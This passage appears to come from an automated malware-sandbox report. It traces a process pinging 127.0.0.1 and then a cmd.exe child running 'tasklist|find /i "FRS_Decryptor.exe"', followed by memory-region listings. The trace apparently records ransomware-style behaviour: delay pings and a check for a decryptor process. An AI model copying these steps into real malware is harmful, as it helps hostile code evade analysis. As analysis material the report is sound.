lpBuffer="à✣") returned 0x0 [0108.209] _fileno (_File=0x76ea4c28) returned 1 [0108.209] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0108.209] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0108.209] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x1067fd8 [0108.209] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x1067fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0108.209] _fileno (_File=0x76ea4c28) returned 1 [0108.209] _write (in: _FileHandle=1, _Buf=0x1067fd8*, _MaxCharCount=0x16 | out: _Buf=0x1067fd8*) returned 22 [0108.210] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0108.210] _fileno (_File=0x76ea4c28) returned 1 [0108.210] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0108.210] LocalFree (hMem=0x1067fd8) returned 0x0 [0108.210] LocalFree (hMem=0x1067fa0) returned 0x0 [0108.210] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xe0f350, nSize=0x0, Arguments=0xe0f34c | out: lpBuffer="羠Ćﴤà⛿\x94䰨盪✼") returned 0x9 [0108.210] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0108.210] _fileno (_File=0x76ea4c28) returned 1 [0108.210] _get_osfhandle (_FileHandle=1) returned 0x28 [0108.210] GetFileType (hFile=0x28) returned 0x2 [0108.210] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f314 | out: lpMode=0xe0f314) returned 0 [0108.210] GetLastError () returned 0x6 [0108.210] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f278, nSize=0x50 | out: lpBuffer="à✼") returned 0x0 [0108.210] _fileno (_File=0x76ea4c28) returned 1 [0108.210] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0108.210] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0108.210] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1058910 [0108.210] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x1058910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0108.210] _fileno (_File=0x76ea4c28) returned 1 [0108.210] _write (in: _FileHandle=1, _Buf=0x1058910*, _MaxCharCount=0x9 | out: _Buf=0x1058910*) returned 9 [0108.210] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0108.210] _fileno (_File=0x76ea4c28) returned 1 [0108.210] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0108.210] LocalFree (hMem=0x1058910) returned 0x0 [0108.210] LocalFree (hMem=0x1067fa0) returned 0x0 [0108.210] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xe0f354, nSize=0x0, Arguments=0xe0f350 | out: lpBuffer="羠Ćﴤà➷\x94䰨盪✧") returned 0x9 [0108.210] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0108.210] _fileno (_File=0x76ea4c28) returned 1 [0108.210] _get_osfhandle (_FileHandle=1) returned 0x28 [0108.210] GetFileType (hFile=0x28) returned 0x2 [0108.210] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f318 | out: lpMode=0xe0f318) returned 0 [0108.210] GetLastError () returned 0x6 [0108.210] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f27c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0108.210] _fileno (_File=0x76ea4c28) returned 1 [0108.210] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0108.210] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0108.210] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1058988 [0108.210] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x1058988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0108.210] _fileno (_File=0x76ea4c28) returned 1 [0108.210] _write (in: _FileHandle=1, _Buf=0x1058988*, _MaxCharCount=0x9 | out: _Buf=0x1058988*) returned 9 [0108.210] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0108.210] _fileno (_File=0x76ea4c28) returned 1 [0108.210] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0108.210] LocalFree (hMem=0x1058988) returned 0x0 [0108.210] LocalFree (hMem=0x1067fa0) returned 0x0 [0108.210] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xe0f350, nSize=0x0, Arguments=0xe0f34c | out: lpBuffer="羠Ćﴤà⟘\x94䰨盪✨") returned 0x9 [0108.210] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0108.210] _fileno (_File=0x76ea4c28) returned 1 [0108.210] _get_osfhandle (_FileHandle=1) returned 0x28 [0108.211] GetFileType (hFile=0x28) returned 0x2 [0108.211] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f314 | out: lpMode=0xe0f314) returned 0 [0108.211] GetLastError () returned 0x6 [0108.211] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f278, nSize=0x50 | out: lpBuffer="à✨") returned 0x0 [0108.211] _fileno (_File=0x76ea4c28) returned 1 [0108.211] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0108.211] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0108.211] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1058a00 [0108.211] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x1058a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0108.211] _fileno (_File=0x76ea4c28) returned 1 [0108.211] _write (in: _FileHandle=1, _Buf=0x1058a00*, _MaxCharCount=0x9 | out: _Buf=0x1058a00*) returned 9 [0108.211] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0108.211] _fileno (_File=0x76ea4c28) returned 1 [0108.211] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0108.211] LocalFree (hMem=0x1058a00) returned 0x0 [0108.211] LocalFree (hMem=0x1067fa0) returned 0x0 [0108.211] Sleep (dwMilliseconds=0x3e8) [0109.225] IcmpSendEcho2Ex (in: IcmpHandle=0x1056d08, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x105c188, RequestSize=0x20, RequestOptions=0xe0f3cc, ReplyBuffer=0x1065270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1065270) returned 0x1 [0109.225] InetNtopW (in: Family=2, pAddr=0xe0f3bc, pStringBuf=0xe0f4e4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0109.225] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xe0f350, nSize=0x0, Arguments=0xe0f34c | out: lpBuffer="羠Ćﴤà⛔\x94䰨盪✣") returned 0x16 [0109.225] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.225] _fileno (_File=0x76ea4c28) returned 1 [0109.225] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.225] GetFileType (hFile=0x28) returned 0x2 [0109.225] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f314 | out: lpMode=0xe0f314) returned 0 [0109.226] GetLastError () returned 0x6 [0109.226] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f278, nSize=0x50 | out: lpBuffer="à✣") returned 0x0 [0109.226] _fileno (_File=0x76ea4c28) returned 1 [0109.226] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0109.226] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0109.226] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x1067fd8 [0109.226] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x1067fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0109.226] _fileno (_File=0x76ea4c28) returned 1 [0109.226] _write (in: _FileHandle=1, _Buf=0x1067fd8*, _MaxCharCount=0x16 | out: _Buf=0x1067fd8*) returned 22 [0109.226] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.226] _fileno (_File=0x76ea4c28) returned 1 [0109.226] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0109.226] LocalFree (hMem=0x1067fd8) returned 0x0 [0109.226] LocalFree (hMem=0x1067fa0) returned 0x0 [0109.226] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xe0f350, nSize=0x0, Arguments=0xe0f34c | out: lpBuffer="羠Ćﴤà⛿\x94䰨盪✼") returned 0x9 [0109.226] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.226] _fileno (_File=0x76ea4c28) returned 1 [0109.226] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.226] GetFileType (hFile=0x28) returned 0x2 [0109.226] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f314 | out: lpMode=0xe0f314) returned 0 [0109.226] GetLastError () returned 0x6 [0109.226] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f278, nSize=0x50 | out: lpBuffer="à✼") returned 0x0 [0109.226] _fileno (_File=0x76ea4c28) returned 1 [0109.226] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0109.226] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0109.226] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1058910 [0109.226] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x1058910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0109.226] _fileno (_File=0x76ea4c28) returned 1 [0109.226] _write (in: _FileHandle=1, _Buf=0x1058910*, _MaxCharCount=0x9 | out: _Buf=0x1058910*) returned 9 [0109.226] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.226] _fileno (_File=0x76ea4c28) returned 1 [0109.226] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0109.226] LocalFree (hMem=0x1058910) returned 0x0 [0109.226] LocalFree (hMem=0x1067fa0) returned 0x0 [0109.226] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xe0f354, nSize=0x0, Arguments=0xe0f350 | out: lpBuffer="羠Ćﴤà➷\x94䰨盪✧") returned 0x9 [0109.226] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.226] _fileno (_File=0x76ea4c28) returned 1 [0109.226] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.226] GetFileType (hFile=0x28) returned 0x2 [0109.226] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f318 | out: lpMode=0xe0f318) returned 0 [0109.226] GetLastError () returned 0x6 [0109.226] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f27c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0109.226] _fileno (_File=0x76ea4c28) returned 1 [0109.226] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0109.226] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0109.226] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1058910 [0109.226] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x1058910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0109.226] _fileno (_File=0x76ea4c28) returned 1 [0109.226] _write (in: _FileHandle=1, _Buf=0x1058910*, _MaxCharCount=0x9 | out: _Buf=0x1058910*) returned 9 [0109.227] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.227] _fileno (_File=0x76ea4c28) returned 1 [0109.227] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0109.227] LocalFree (hMem=0x1058910) returned 0x0 [0109.227] LocalFree (hMem=0x1067fa0) returned 0x0 [0109.227] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xe0f350, nSize=0x0, Arguments=0xe0f34c | out: lpBuffer="羠Ćﴤà⟘\x94䰨盪✨") returned 0x9 [0109.227] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.227] _fileno (_File=0x76ea4c28) returned 1 [0109.227] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.227] GetFileType (hFile=0x28) returned 0x2 [0109.227] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f314 | out: lpMode=0xe0f314) returned 0 [0109.227] GetLastError () returned 0x6 [0109.227] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f278, nSize=0x50 | out: lpBuffer="à✨") returned 0x0 [0109.227] _fileno (_File=0x76ea4c28) returned 1 [0109.227] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.227] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0109.227] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1058a00 [0109.227] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x1058a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0109.227] _fileno (_File=0x76ea4c28) returned 1 [0109.227] _write (in: _FileHandle=1, _Buf=0x1058a00*, _MaxCharCount=0x9 | out: _Buf=0x1058a00*) returned 9 [0109.227] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.227] _fileno (_File=0x76ea4c28) returned 1 [0109.227] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.227] LocalFree (hMem=0x1058a00) returned 0x0 [0109.227] LocalFree (hMem=0x1067fa0) returned 0x0 [0109.227] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xe0f2d8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0109.227] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xe0f2ac, nSize=0x0, Arguments=0xe0f2a8 | out: lpBuffer="羠Ćà᧰\x94䰨盪❏") returned 0x5c [0109.227] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.227] _fileno (_File=0x76ea4c28) returned 1 [0109.227] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.227] GetFileType (hFile=0x28) returned 0x2 [0109.227] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f270 | out: lpMode=0xe0f270) returned 0 [0109.227] GetLastError () returned 0x6 [0109.227] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f1d4, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0109.227] _fileno (_File=0x76ea4c28) returned 1 [0109.227] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.227] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0109.227] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x1068068 [0109.227] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x1068068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0109.227] _fileno (_File=0x76ea4c28) returned 1 [0109.227] _write (in: _FileHandle=1, _Buf=0x1068068*, _MaxCharCount=0x5c | out: _Buf=0x1068068*) returned 92 [0109.227] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.227] _fileno (_File=0x76ea4c28) returned 1 [0109.227] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.227] LocalFree (hMem=0x1068068) returned 0x0 [0109.227] LocalFree (hMem=0x1067fa0) returned 0x0 [0109.227] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xe0f2b8, nSize=0x0, Arguments=0xe0f2b4 | out: lpBuffer="羠Ćàᨧ\x94䰨盪❓") returned 0x61 [0109.227] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.227] _fileno (_File=0x76ea4c28) returned 1 [0109.227] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.227] GetFileType (hFile=0x28) returned 0x2 [0109.227] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f27c | out: lpMode=0xe0f27c) returned 0 [0109.228] GetLastError () returned 0x6 [0109.228] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f1e0, nSize=0x50 | out: lpBuffer="à❓") returned 0x0 [0109.228] _fileno (_File=0x76ea4c28) returned 1 [0109.228] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.228] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0109.228] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x1068070 [0109.228] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x1068070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0109.228] _fileno (_File=0x76ea4c28) returned 1 [0109.228] _write (in: _FileHandle=1, _Buf=0x1068070*, _MaxCharCount=0x61 | out: _Buf=0x1068070*) returned 97 [0109.228] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.228] _fileno (_File=0x76ea4c28) returned 1 [0109.228] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.228] LocalFree (hMem=0x1068070) returned 0x0 [0109.228] LocalFree (hMem=0x1067fa0) returned 0x0 [0109.228] IcmpCloseHandle (IcmpHandle=0x1056d08) returned 1 [0109.228] LocalFree (hMem=0x105c188) returned 0x0 [0109.228] LocalFree (hMem=0x1065270) returned 0x0 [0109.228] WSACleanup () returned 0 [0109.228] exit (_Code=0) Thread: id = 296 os_tid = 0x8b4 Thread: id = 297 os_tid = 0x968 Process: id = "106" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x61bd3000" os_pid = "0x404" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5480 start_va = 0x7d0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 5481 start_va = 0x7f0000 end_va = 0x7f1fff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 5482 start_va = 0x800000 end_va = 0x80efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 5483 start_va = 0x810000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 5484 start_va = 0x850000 end_va = 0x94ffff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 5485 start_va = 0x950000 end_va = 0x953fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 5486 start_va = 0x960000 end_va = 0x960fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 5487 start_va = 0x970000 end_va = 0x971fff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 5488 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5489 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5490 start_va = 0x7efc0000 end_va = 0x7efe2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efc0000" filename = "" Region: id = 5491 start_va = 0x7efe9000 end_va = 0x7efebfff entry_point = 0x0 region_type = private name = "private_0x000000007efe9000" filename = "" Region: id = 5492 start_va = 0x7efec000 end_va = 0x7efecfff entry_point = 0x0 region_type = private name = "private_0x000000007efec000" filename = "" Region: id = 5493 start_va = 0x7efef000 end_va = 0x7efeffff entry_point = 0x0 region_type = private name = "private_0x000000007efef000" filename = "" Region: id = 5494 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5495 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5496 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5497 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5498 start_va = 0x9a0000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 5499 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5500 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5501 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5502 start_va = 0x7d0000 end_va = 0x7dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 5503 start_va = 0x9b0000 end_va = 0xa2dfff entry_point = 0x9b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5504 start_va = 0xb00000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 5505 start_va = 0xb20000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 5506 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5507 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5508 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5509 start_va = 0x7eec0000 end_va = 0x7efbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eec0000" filename = "" Region: id = 5510 start_va = 0x7e0000 end_va = 0x7e3fff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 5511 start_va = 0xc20000 end_va = 0xef4fff entry_point = 0xc20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5530 start_va = 0x7f0000 end_va = 0x7f3fff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" 